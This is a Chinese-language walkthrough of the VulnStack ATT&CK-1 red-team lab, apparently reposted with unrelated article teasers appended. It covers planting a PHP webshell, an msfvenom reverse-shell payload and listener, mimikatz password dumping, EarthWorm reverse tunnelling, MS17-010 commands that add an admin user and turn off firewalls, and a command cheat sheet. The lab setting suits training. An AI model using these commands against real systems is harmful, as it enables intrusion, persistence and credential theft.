《VulnStack》ATTCK-1

news2024/11/26 17:30:42

title: 《VulnStack》ATT&CK-1
date: 2024-01-29 14:53:49
updated: 2024-02-14 18:55:49
categories: WriteUp:Cyber-Range
excerpt: 主机发现、端口扫描,服务探测,操作系统探测、nmap 漏洞库扫描、网站首页信息泄露、msf 渗透与信息收集、mimikatz 抓取密码、rdesktop 连接远程桌面、探测内网存活主机、msf 添加内网路由、EarthWorm 内网穿透、proxychains4 代理、msf 利用 MS17-010(永恒之蓝)漏洞、共享 C 盘利用。
comments: false
tags:
top_image: /images/backimg/SunsetClimbing.png


VulnStack

  • 1:靶场信息
  • 2:打靶
    • 2.1:情报收集 & 威胁建模
    • 2.2:漏洞分析 & 渗透攻击
    • 2.3:后渗透
      • 2.3.1:提权
      • 2.3.2:内网渗透
        • 2.3.2.1:信息收集
        • 2.3.2.2:内网穿透
        • 2.3.2.3:横向移动
        • 2.3.2.4:杀入域控
  • 3:总结
    • 3.1:命令 & 工具
      • 3.1.1:Nmap
      • 3.1.2:MSF
        • 3.1.2.1:web server 渗透
        • 3.1.2.2:域成员 Win 2003 渗透
      • 3.1.3:mimikatz
      • 3.1.4:EarthWorm
      • 3.1.5:proxychains4
      • 3.1.6:Windows 命令使用
    • 3.2:关键技术


VulnStack:红日安全 ATT&CK 实战 - 红队评估系列打靶记录。
VulnStack 官网:http://vulnstack.qiyuanxuetang.net/vuln/

攻击机为 Kali-Linux-2023.3-vmware-amd64。
Kali NAT IP:192.168.8.10。

1:靶场信息

靶场地址:
http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

靶场结构:

在这里插入图片描述

内网网段:192.168.52.0/24

2:打靶

2.1:情报收集 & 威胁建模

主机发现
nmap -sn 192.168.8.0/24

在这里插入图片描述

得到服务器 IP:192.168.8.168。

进行端口扫描、服务探测、操作系统探测
nmap 192.168.8.168 -p- -sV -sC -O -oN nmap-scan.txt

┌──(root㉿kali)-[~/Desktop/att&ck-1]
└─# nmap 192.168.8.168 -p- -sV -sC -O -oN nmap-scan.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-02 22:13 HKT
Stats: 0:00:47 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 35.15% done; ETC: 22:15 (0:01:29 remaining)
Nmap scan report for 192.168.8.168
Host is up (0.00065s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)
|_http-title: phpStudy \xE6\x8E\xA2\xE9\x92\x88 2014 
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
5357/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
|_http-server-header: Microsoft-HTTPAPI/2.0
MAC Address: 00:0C:29:69:9D:AD (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8.1|Phone|Vista|2008|7 (92%)
OS CPE: cpe:/o:microsoft:windows_8.1:r1 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8
Aggressive OS guesses: Microsoft Windows 8.1 R1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (92%), Microsoft Windows Embedded Standard 7 (92%), Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008 (91%), Microsoft Windows Server 2008 or 2008 Beta 3 (89%), Microsoft Windows Server 2008 R2 or Windows 8.1 (89%), Microsoft Windows 7 Professional or Windows 8 (89%), Microsoft Windows 7 (87%), Microsoft Windows Server 2008 R2 SP1 (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 132.46 seconds

访问网站,直接泄露了 php 探针…

在这里插入图片描述

但其实网站首页应该是这个:http://192.168.8.168/yxcms/

访问网站首页,在公告处泄露了后台信息:

在这里插入图片描述

用 nmap 的漏洞库对端口进行扫描
nmap 192.168.8.168 --script=vuln -p 80,5357 -oN nmap-vuln.txt

# Nmap 7.94SVN scan initiated Tue Jan  2 22:26:35 2024 as: nmap --script=vuln -p 80,5357 -oN nmap-vuln.txt 192.168.8.168
Nmap scan report for 192.168.8.168
Host is up (0.00058s latency).

PORT     STATE SERVICE
80/tcp   open  http
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.168.8.168:80/l.php?act=Function%27%20OR%20sqlspider
|     http://192.168.8.168:80/l.php?act=phpinfo%27%20OR%20sqlspider
|     http://192.168.8.168:80/l.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000%27%20OR%20sqlspider
|     http://192.168.8.168:80/l.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42%27%20OR%20sqlspider
|     http://192.168.8.168:80/l.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42%27%20OR%20sqlspider
|     http://192.168.8.168:80/l.php?act=Function%27%20OR%20sqlspider
|     http://192.168.8.168:80/l.php?act=phpinfo%27%20OR%20sqlspider
|   Possible sqli for forms:
|     Form at path: /, form's action: /l.php#bottom. Fields that might be vulnerable:
|       host
|       port
|       login
|       funName
|     Form at path: /l.php, form's action: /l.php#bottom. Fields that might be vulnerable:
|       host
|       port
|       login
|_      funName
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.8.168
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.8.168:80/
|     Form id: 
|     Form action: /l.php#bottom
|     
|     Path: http://192.168.8.168:80/l.php
|     Form id: 
|_    Form action: /l.php#bottom
| http-phpself-xss: 
|   VULNERABLE:
|   Unsafe use of $_SERVER["PHP_SELF"] in PHP files
|     State: VULNERABLE (Exploitable)
|       PHP files are not handling safely the variable $_SERVER["PHP_SELF"] causing Reflected Cross Site Scripting vulnerabilities.
|              
|     Extra information:
|       
|   Vulnerable files with proof of concept:
|     http://192.168.8.168/l.php/%27%22/%3E%3Cscript%3Ealert(1)%3C/script%3E
|   Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.8.168
|     References:
|       https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
|_      http://php.net/manual/en/reserved.variables.server.php
| http-enum: 
|   /phpinfo.php: Possible information file
|   /phpmyadmin/: phpMyAdmin
|   /phpMyAdmin/: phpMyAdmin
|_  /PHPMyAdmin/: phpMyAdmin
5357/tcp open  wsdapi
MAC Address: 00:0C:29:69:9D:AD (VMware)

# Nmap done at Tue Jan  2 22:27:59 2024 -- 1 IP address (1 host up) scanned in 84.04 seconds

探测到了 sql 注入与 phpmyadmin 后台。不过决定先尝试一下其他方法。

2.2:漏洞分析 & 渗透攻击

根据网站泄露的信息直接访问网站后台:http://192.168.8.168/yxcms/index.php?r=admin

在这里插入图片描述

直接进入了后台。

在这里插入图片描述

功能很多啊。这里发现 “ 前台模板 ” 处可以直接编辑 php 文件。

在这里插入图片描述

在这里插入图片描述

在首页随便点击几个板块,找到了该 CMS 模板名称与 url 的关系。

在这里插入图片描述

这里就选择 photo_index.php 写入一句话木马。

在这里插入图片描述

再次访问板块可以发现木马已执行。

在这里插入图片描述

使用蚁剑连接:

在这里插入图片描述

2.3:后渗透

2.3.1:提权

先利用蚁剑的虚拟终端随便查看一下信息。

在这里插入图片描述

直接就是 admin 账户,很省事,方便提权至 system。

那就先试试反弹 shell。这里使用 metasploit 生成后门文件,然后上传至目标机器反弹 shell。

msf,启动!
msfdb init && msfconsole

查看一下 Windows 反弹 shell 的相关工具。
search windows/meterpreter/reverse_tcp

在这里插入图片描述

可以查看一下相关参数。

在这里插入图片描述

生成 Windows 后门程序(Windows 载荷):
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.8.15 LPORT=7777 -f exe -o '/root/Desktop/att&ck-1/shell.exe'

在这里插入图片描述

msf 配置启动监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.8.15
set lport 7777
show options
exploit

在这里插入图片描述

将刚才生成的 Windows 后门程序 shell.exe 通过蚁剑上传到目标机器并运行。

在这里插入图片描述

在这里插入图片描述

成功反弹 shell。

在这里插入图片描述

执行 post/windows/manage/enable_rdp 模块,关闭防火墙并启用远程桌面
run post/windows/manage/enable_rdp

在这里插入图片描述

使用 rdesktop 打开远程桌面。可以看到控制成功。
rdesktop 192.168.8.168

在这里插入图片描述

查看用户,提权
getuid
getsystem

在这里插入图片描述

2.3.2:内网渗透

2.3.2.1:信息收集

为内网的渗透做一些准备。后渗透阶段的信息收集包括但不限于以下操作:

使用 msf 模块进行信息收集

run post/windows/gather/enum_patches         # 查询补丁信息
run post/windows/gather/enum_applications    # 查询已安装软件
run get_local_subnets                        # 查看路由信息

在这里插入图片描述

使用 Windows 下命令进行信息收集

wmic os get osarchitecture                # 查看系统架构
ipconfig /all                             # 查询本机IP段,所在域等
route print                               # 路由信息 
net config workstation                    # 当前计算机名,用户名,系统版本,工作站域    
net user                                  # 本机用户列表   
net user /domain                          # 当前域下本机的所有用户 
net localgroup administrators             # 本机管理员[通常含有域用户]    
net view                                  # 查看域信息/局域网内其他主机    
net view /domain                          # 查询主域信息   
net time /domain                          # 判断主域
net start                                 # 查看开启了哪些服务
net share                                 # 查看开启了哪些共享        
net group "domain controllers" /domain    # 查看域控制器组
net group "domain computers" /domain      # 查看域中的其他主机
net group "domain admins" /domain         # 尝试查询域管理员的名字

《Windows 判断是否存在域,搜集域内基本信息》
https://blog.csdn.net/qq_36279445/article/details/110647055

另外,如果遇到乱码问题,在 Windows shell 中执行 chcp 65001 可以缓解部分乱码问题。

chcp 是 Windows 中的命令,用于改变当前控制台的代码页(code page)。65001 则是特定的表示 UTF-8 编码的代码页。
chcp 65001 的作用是将当前控制台的代码页设置为 UTF-8。(将部分输出转换为英文)
Windows 中,默认代码页通常根据系统区域设置而确定,而不是总是设置为 UTF-8。

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

确定了域控主机名:OWA。IP:192.168.52.138。

以上是一些基础的信息收集,下面进行进一步的信息收集。

抓取目标机器上的密码 Hash

hashdump 已经过时了,不过可以使用 post/windows/gather/smart_hashdump 模块。

在这里插入图片描述

抓取密码 Hash
run windows/gather/smart_hashdump

在这里插入图片描述

虽然抓到了密码 hash,不过根据结果来看并没有解密成功。

那就上传 mimikatz 来抓取密码。(实战中需要做免杀处理)

kali 自带 mimikatz:/usr/share/windows-resources/mimikatz/

确定一下目标机器的系统版本
wmic os get osarchitecture

在这里插入图片描述

通过 msf 上传 mimikatz 至目标机器指定位置。
upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe c:\\

在这里插入图片描述

在这里插入图片描述

提升 mimikatz 权限
privilege::debug

抓取密码
sekurlsa::logonpasswords

在这里插入图片描述

成功获取 GOD 域下 Administrator(域管理员)的明文密码:hongri@2023

接下来进一步渗透内网(横向移动),对域中其他主机进行渗透。这里服务器为已被控制的机器。

2.3.2.2:内网穿透

通过 msf 借助服务器使用 ping 命令探测内网存活主机
for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.52.%I | findstr "TTL="

在这里插入图片描述

探测到几台主机,给 msf 添加内网路由,进行下一步渗透。

MSF 跳板功能是 MSF 框架中自带的一个路由转发功能。实现过程就是 MSF 框架在已经获取的 Meterpreter Shell 的基础上添加一条去往 “ 内网 ” 的路由,以此直接使用 MSF 去访问原本不能直接访问的内网资源。

通过已控制的 session 添加内网路由
route add 192.168.52.141 255.255.255.0 4

在这里插入图片描述

添加成功。

也可以添加全网段路由,这样可以访问被控机器可达的所有地址:
route add 0.0.0.0 0.0.0.0 <session id>

测试一下,使用 post/windows/gather/arp_scanner 模块扫描内网主机。
run post/windows/gather/arp_scanner RHOSTS=192.168.52.0/24

在这里插入图片描述

现在 msf 已经可以通信到内网其他主机,为了让攻击机上的其他工具可以通信到内网其他主机,需要设置代理。

这里用 EarthWorm 做 Socks5 代理作为跳板进入内网。

也可以借助已获取内网通信的 msf 来设置 sock4a 代理,使攻击机其他工具通信到内网。参考:
《ATT&CK红队评估实战靶场-1》:
https://blog.csdn.net/qq_40638006/article/details/122033546

内网穿透工具 EarthWorm(EW)项目地址:
https://github.com/idlefire/ew

后来发现 ew 已经停止更新很久了。。。在这里补充一些内网渗透的知识和工具。
《内网穿透常用方法系列总结》:
https://blog.csdn.net/m0_64910183/article/details/129211220
《几款实用的内网穿透工具》:
https://blog.csdn.net/MachineGunJoe/article/details/129385096
《内网安全:内网穿透详解》:
https://blog.csdn.net/qq_61553520/article/details/131037631

下载 EW 后将相应版本上传到主机。(已控制的服务器为 Win7)

在这里插入图片描述

通过 msf 上传到 win7 受害主机。
upload '/root/Desktop/att&ck-1/ew_for_Win.exe' c:\\

在这里插入图片描述

给攻击机上的 ew 添加可执行权限并监听等待连接(真实情况下可借助 VPS)。

chmod +x ew_for_linux64
./ew_for_linux64 -s rcsocks -l 1080 -e 1234

在这里插入图片描述

在 win7 上启动 socks5 服务器反弹到攻击机上(真实情况下反弹至 VPS 的 IP)。
ew_for_Win.exe -s rssocks -d 192.168.8.15 -e 1234

在这里插入图片描述

这样就建立了一条通信通道。使用 proxychains4 作为代理

proxychains4 配置文件 /etc/proxychains4.conf。配置代理。

在这里插入图片描述

测试一下内网穿透。
proxychains4 nmap -p 3389,21,445 -Pn -sT 192.168.52.141

在这里插入图片描述

成功。

这里使用的是 socks5 协议,支持 TCP/UDP 等,但不支持 ICMP,即不能使用 ping。所以 nmap 必须加上参数 -Pn-sT

proxychain4 会输出一些超时错误信息,不方便查看,可以加上参数 -q 使用安静模式。
proxychains4 -q nmap -p 3389,21,445 -Pn -sT 192.168.52.141

在这里插入图片描述

也可以将错误信息重定向。
proxychains4 nmap -p 3389,21,445 -Pn -sT 192.168.52.141 2>/dev/null

在内网信息收集时已经确定域控为 192.168.52.138。那就先渗透身为域成员的 192.168.52.141。

2.3.2.3:横向移动

由于通过代理,nmap 使用 TCP 扫描,速度比较慢,先简单扫描一下内网主机。这里先对 192.168.52.141 下手。

nmap 扫描

proxychains4 -q nmap 192.168.52.141 -Pn -sT --top-ports 200

在这里插入图片描述

proxychains4 -q nmap 192.168.52.141 -Pn -sT -O

在这里插入图片描述

proxychains4 -q nmap 192.168.52.141 -Pn -sT -p 21,445,3389

在这里插入图片描述

可以看到 3389 端口关闭,nmap 的 OS 探测模棱两可。445 端口开启,可以使用 msf 的 auxiliary/scanner/smb/smb_version 模块探测下操作系统版本。

use auxiliary/scanner/smb/smb_version
set rhost 192.168.52.141
run

在这里插入图片描述

可以确定 192.168.52.141 为 Win 2003。

445 端口开启,可以尝试利用 MS17-010(永恒之蓝)漏洞。
search ms17-010

在这里插入图片描述

使用 auxiliary/scanner/smb/smb_ms17_010 模块检测,发现 MS17-010 可利用。

使用 auxiliary/admin/smb/ms17_010_command 模块执行命令将目标 3389 端口开启。

use auxiliary/admin/smb/ms17_010_command
show options
set rhosts 192.168.52.141
set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'
run

在这里插入图片描述

在这里插入图片描述

再次扫描 3389 端口可以发现开放。

在这里插入图片描述

此时已经可以通过远程桌面登录。

在这里插入图片描述

这里可以尝试使用 exploit/windows/smb/ms17_010_psexec 模块获取一个 shell。不过此模块需要指定一个管理员用户才能更好利用,所以先用 auxiliary/admin/smb/ms17_010_command 模块添加一个管理员用户。

添加用户 bob:

use auxiliary/admin/smb/ms17_010_command
show options
set COMMAND net user bob 123.com /add
set RHOST 192.168.52.141
run

在这里插入图片描述

将用户 bob 添加至管理员组:

set COMMAND net localgroup administrators bob /add
run

在这里插入图片描述

查看一下结果:

set COMMAND net localgroup administrators
run

在这里插入图片描述

然后使用 exploit/windows/smb/ms17_010_psexec 模块尝试获得 session,不过尝试都失败了。

在这里插入图片描述

那就只能尝试 auxiliary/admin/smb/ms17_010_command 模块,借助内网隧道,利用 powershell 等方法反弹一个 cmd。这里就先不尝试了,总之 192.168.52.141 这台主机算是拿下了。

2.3.2.4:杀入域控

之前已经知道域控 ip 为 192.168.52.138。先 nmap 探测一下。
proxychains4 -q nmap 192.168.52.138 -Pn -sT --top-ports 200

在这里插入图片描述

用 msf 的 auxiliary/scanner/smb/smb_version 模块探测下操作系统版本。

use auxiliary/scanner/smb/smb_version
set rhost 192.168.52.138
run

在这里插入图片描述

再使用 auxiliary/scanner/smb/smb_ms17_010 模块扫描是否可利用永恒之蓝。

use auxiliary/scanner/smb/smb_ms17_010
set rhost 192.168.52.138
run

在这里插入图片描述

尝试利用。

use auxiliary/admin/smb/ms17_010_command
show options
set rhosts 192.168.52.138
set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'
run

但 3389 端口开启失败。不过永恒之蓝漏洞确实是可以利用的。

在这里插入图片描述

查看了一下系统架构。

在这里插入图片描述

内网下某些漏洞利用模块似乎无法使用。

不过可以看到域控共享了 c 盘。

在这里插入图片描述

可以通过 Win7 上传文件至域控。

net use \\192.168.52.138\c$ "hongri@2023" /user:"administrator"
copy <file> \\192.168.52.138\c$
dir \\192.168.52.138\c$

在这里插入图片描述

不过尝试了多种方法也没有直接取得 shell。(主要是尝试正向连接,反弹连接应该是不用想了,主要是内网穿透工具的限制)

尝试关闭防火墙。
set command 'chcp 65001 && netsh advfirewall set allprofiles state off'

在这里插入图片描述

成功。。

然后 nc 就可以连上了。。。(虽然没有取得 shell)

在这里插入图片描述

之后远程桌面 3389 端口也可以打开了。

在这里插入图片描述

在这里插入图片描述

至此算是拿下域控了。之前耗了很大精力各种尝试,却忘了可以直接对防火墙下手。。。已经在崩溃边缘徘徊了。。。

就不重复尝试获取 shell 了。这里挂个参考文章。

《ATT&CK红队评估实战靶场-1》
https://blog.csdn.net/qq_40638006/article/details/122033546

3:总结

作为第一个内网靶场,说难也难,说简单也不简单。╮(︶﹏︶")╭ 鬼知道我经历了什么

3.1:命令 & 工具

  • nmap
  • 蚁剑
  • msf
  • rdesktop
  • mimikatz
  • EarthWorm
  • proxychains4
  • netcat

3.1.1:Nmap

部分选项

参数介绍
-snPing Scan - disable port scan
-sVProbe open ports to determine service/version info
-sCequivalent to --script=default
-PnTreat all hosts as online -- skip host discovery
-sS/sT/sA/sW/sMTCP SYN/Connect()/ACK/Window/Maimon scans
--top-ports <num>Scan <num> most common ports

部分命令

目标信息扫描,进行端口扫描、服务探测、操作系统探测,并保存:
nmap <target> -p- -sV -sC -O -oN nmap-scan.txt

目标漏洞扫描,用 nmap 的漏洞库对端口进行扫描:
nmap <target> --script=vuln -p <port>

3.1.2:MSF

以该靶场为例介绍 MSF。

初始化 msf 数据库并启动

msfdb init && msfconsole
3.1.2.1:web server 渗透

查看 Windows 反弹 shell 的相关工具

search windows/meterpreter/reverse_tcp

生成 Windows 后门程序(Windows 载荷),反弹 shell:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f exe -o '<exe file>'

msf 配置启动监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set lhost <ip>
set lport <port>
exploit

将生成的 exe 后门程序通过蚁剑上传到目标机器并运行

后渗透 & 后渗透模块使用

getuid                                                  # 查看用户
getsystem                                               # 提权
run post/windows/manage/enable_rdp                      # 关闭防火墙并启用远程桌面
run post/windows/gather/enum_patches                    # 查询补丁信息
run post/windows/gather/enum_applications               # 查询已安装软件
run post/windows/gather/arp_scanner RHOSTS=<ip cidr>    # arp 内网扫描(需添加内网路由)
run get_local_subnets                                   # 查看路由信息
run windows/gather/smart_hashdump                       # 抓取密码 Hash
upload <file> <path>                                    # 上传文件至目标机器

通过已控制的 session 添加内网路由

  1. 将获取的 session 挂到后台。
    background
  2. 查看路由:
    route print
  3. 添加内网路由:route add <ip> <mask> <session id>

如下添加全网段路由,可以访问被控机器可达的所有地址:
route add 0.0.0.0 0.0.0.0 <session id>

3.1.2.2:域成员 Win 2003 渗透

445 端口开启,可以使用相应模块探测操作系统版本

use auxiliary/scanner/smb/smb_version
set rhost 192.168.52.141
run

445 端口开启,可以尝试利用 MS17-010(永恒之蓝)漏洞

search ms17-010
# 可以使用 auxiliary/scanner/smb/smb_ms17_010 模块检测 MS17-010 是否可利用。
# 使用以下模块执行命令将目标 3389 端口开启。
use auxiliary/admin/smb/ms17_010_command
show options
set rhosts 192.168.52.141
set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'
run

3.1.3:mimikatz

kali 自带 mimikatz:/usr/share/windows-resources/mimikatz/

mimikatz 提升权限
privilege::debug

抓取密码
sekurlsa::logonpasswords

3.1.4:EarthWorm

内网穿透工具 EarthWorm(EW)项目地址
https://github.com/idlefire/ew

ew 已经停止更新很久了。这里补充一些内网渗透的知识和工具。

《内网穿透常用方法系列总结》:
https://blog.csdn.net/m0_64910183/article/details/129211220

《几款实用的内网穿透工具》:
https://blog.csdn.net/MachineGunJoe/article/details/129385096

《内网安全:内网穿透详解》:
https://blog.csdn.net/qq_61553520/article/details/131037631

3.1.5:proxychains4

proxychains4 配置文件:/etc/proxychains4.conf。

部分命令

基本使用:
proxychains4 <command>

使用安静模式:
proxychains4 -q <command>

3.1.6:Windows 命令使用

chcp 65001                                       # 将当前控制台代码页设置为 UTF-8
ipconfig /all                                    # 查询本机 ip 段,所在域等
route print                                      # 路由信息 
netsh advfirewall set allprofiles state off      # 关闭系统防火墙
wmic os get osarchitecture                       # 查看系统架构
net config workstation                           # 当前计算机名,用户名,系统版本,工作站域    
net user                                         # 本机用户列表   
net user /domain                                 # 当前域下本机的所有用户 
net user <username> <password> /add              # 添加一个用户
net localgroup administrators <username> /add    # 将用户添加至管理员组
net localgroup administrators                    # 查看本机管理员(通常含有域用户)    
net view                                         # 查看域信息 / 局域网内其他主机    
net view /domain                                 # 查询主域信息   
net time /domain                                 # 判断主域
net start                                        # 查看开启了哪些服务
net share                                        # 查看开启了哪些共享        
net group "domain controllers" /domain           # 查看域控制器组
net group "domain computers" /domain             # 查看域中的其他主机
net group "domain admins" /domain                # 尝试查询域管理员的名字

使用 ping 命令探测内网存活主机(以 192.168.52.0/24 为例):

# for /L %I in (1,1,254) DO @ping -w 1 -n 1 xxx.xxx.xx.%I | findstr "TTL="
for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.52.%I | findstr "TTL="

开启远程桌面服务(3389 端口)

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

在本地系统上映射远程计算机的共享文件夹(以共享 C 盘为例):

# net use \\<ip>\<path> "<password>" /user:"<username>"
net use \\192.168.52.138\c$ "hongri@2023" /user:"administrator"

将文件复制到远程计算机的共享文件夹中

copy <file> \\<ip>\<path>

查看远程计算机的共享文件夹

dir \\<ip>\<path>

3.2:关键技术

  • 主机发现
    nmap -sn <ip cidr>

  • 目标信息扫描,进行端口扫描、服务探测、操作系统探测:
    nmap <target> -p- -sV -sC -O

  • 目标漏洞扫描,用 nmap 的漏洞库对端口进行扫描:
    nmap <target> --script=vuln -p <port>

  • 网站首页信息泄露

  • 网站后台登录,写入一句话木马,蚁剑连接。

  • msf 渗透 web 服务器, 并对 web 服务器进行信息收集

  • mimikatz 抓取密码

  • rdesktop 连接远程桌面
    rdesktop <ip>

  • msf 借助服务器使用 ping 命令探测内网存活主机

  • msf 通过已控制的 session 添加内网路由

  • 使用 EarthWorm 进行内网穿透,做 Socks5 代理作为跳板进入内网。

  • 使用 proxychains4 作为代理
    proxychains4 -q <command>

  • msf 渗透域成员(win2003),MS17-010(永恒之蓝)漏洞利用。

  • msf 渗透域控(win2008),MS17-010(永恒之蓝)漏洞利用,共享 C 盘利用。


人生亦有命,安能行叹复坐愁?

——《拟行路难 · 其四》(南北朝)鲍照

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1448992.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

源码推荐:hello-algo @ github

github https://github.com/krahets/hello-algo 本项目旨在创建一本开源、免费、对新手友好的数据结构与算法入门教程。全书采用动画图解&#xff0c;结构化地讲解数据结构与算法知识&#xff0c;内容清晰易懂&#xff0c;学习曲线平滑。算法源代码皆可一键运行&#xff0c;支…

【IDEA】新建Spring Initializr项目,选择java版本只有是17和21问题的解决方法

新建Spring Initializr项目时&#xff0c;选择java版本只有是17和21 2. 将https://start.spring.io修改为阿里云的服务器路径&#xff1a;https://start.aliyun.com 能够选择Java8、11等版本

【Linux笔记】动静态库的封装和加载

一、静态库的封装 我们在学习C语言阶段其实就已经知道一个可执行程序的形成过程分为预处理、编译、汇编、链接这四个阶段&#xff0c;而且也知道我们程序中使用的各种库其实是在链接的阶段加载的。 可我们那时候并不知道库是怎么被加载的&#xff0c;或者库是怎么形成的&…

项目访问量激增该如何应对

✨✨ 欢迎大家来到喔的嘛呀的博客✨✨ &#x1f388;&#x1f388;希望这篇博客对大家能有帮助&#x1f388;&#x1f388; 目录 引言 一. 优化数据库 1.1 索引优化 1.2 查询优化 1.3 数据库设计优化 1.4 事务优化 1.5 硬件优化 1.6 数据库配置优化 二. 增加服务器资源…

监督学习:从数据中挖掘模式的引导

目录 前言1 定义2 举例说明3 回归问题4 分类问题结论 前言 监督学习是机器学习领域中的一种重要方法&#xff0c;通过给模型提供带有标签的训练数据&#xff0c;使其能够学习输入与输出之间的关系。这种学习方式在各个领域都有广泛的应用&#xff0c;从垃圾邮件过滤到医学诊断…

ClickHouse--08--SQL DDL 操作

提示&#xff1a;文章写完后&#xff0c;目录可以自动生成&#xff0c;如何生成可参考右边的帮助文档 文章目录 SQL DDL 操作1 创建库2 查看数据库3 删除库4 创建表5 查看表6 查看表的定义7 查看表的字段8 删除表9 修改表9.1 添加列9.2 删除列9.3 清空列9.4 给列修改注释9.5 修…

【AI视野·今日CV 计算机视觉论文速览 第298期】Fri, 26 Jan 2024

AI视野今日CS.CV 计算机视觉论文速览 Fri, 26 Jan 2024 Totally 71 papers &#x1f449;上期速览✈更多精彩请移步主页 Daily Computer Vision Papers Multimodal Pathway: Improve Transformers with Irrelevant Data from Other Modalities Authors Yiyuan Zhang, Xiaohan …

ARP请求的构造过程

ARP请求的构造过程&#xff1a; ARP请求的构造&#xff1a; 当设备A&#xff08;发起者&#xff09;想要与设备B&#xff08;目标&#xff09;通信&#xff0c;但它只知道设备B的IP地址&#xff08;例如&#xff0c;192.168.1.2&#xff09;&#xff0c;而不知道其MAC地址。设备…

OpenGL-ES 学习(4)---- OpenGL-ES 坐标体系

坐标体系 我们知道 OpenGL -ES 坐标系中每个顶点的 x&#xff0c;y&#xff0c;z 坐标都应该在 -1.0 到 1.0 之间&#xff0c;超出这个坐标范围的顶点都将不可见。 将一个物体&#xff08;图像&#xff09;渲染到屏幕上&#xff0c;通常经过将物体坐标转换为标准化设备坐标&am…

顺序表(上)

1.顺序表的概念 顺序表&#xff08;Sequential List&#xff09;是一种基本的数据结构&#xff0c;它是一种线性表的存储结构。线性表是一种数据元素的有限序列&#xff0c;元素之间存在顺序关系。 线性表&#xff1a;线性表&#xff08; linearlist &#xff09;是n个具有相…

PHP毕业设计图片分享网站76t17

图片分享网站主要是为了提高工作人员的工作效率和更方便快捷的满足用户&#xff0c;更好存储所有数据信息及快速方便的检索功能&#xff0c;对系统的各个模块是通过许多今天的发达系统做出合理的分析来确定考虑用户的可操作性&#xff0c;遵循开发的系统优化的原则&#xff0c;…

【树莓派系统的位数】

要区分 ARM 架构下载的版本是 32 位还是 64 位&#xff0c;可以执行以下步骤&#xff1a; 执行以下命令来检查 Raspberry Pi 的 CPU 类型&#xff1a; uname -m如果返回的结果是 aarch64&#xff0c;则表示您的 Raspberry Pi 是 64 位的 ARM 架构。如果返回的结果是 armv7l&a…

代码随想录 Leetcode134. 加油站

题目&#xff1a; 代码(首刷看解析 2024年2月15日&#xff09;&#xff1a; class Solution { public:int canCompleteCircuit(vector<int>& gas, vector<int>& cost) {int curSum 0;int sum 0;int startIndex 0;for (int i 0; i < gas.size(); i)…

18 19 SPI接口的74HC595驱动数码管实验

1. 串行移位寄存器原理&#xff08;以四个移位寄存器为例&#xff09; 1. 通过移位寄存器实现串转并&#xff1a;一个数据输入端口可得到四位并行数据。 通过给data输送0101数据&#xff0c;那么在经过四个时钟周期后&#xff0c;与data相连的四个寄存器的输出端口得到了0101…

高德地图上绘制热力图的方法

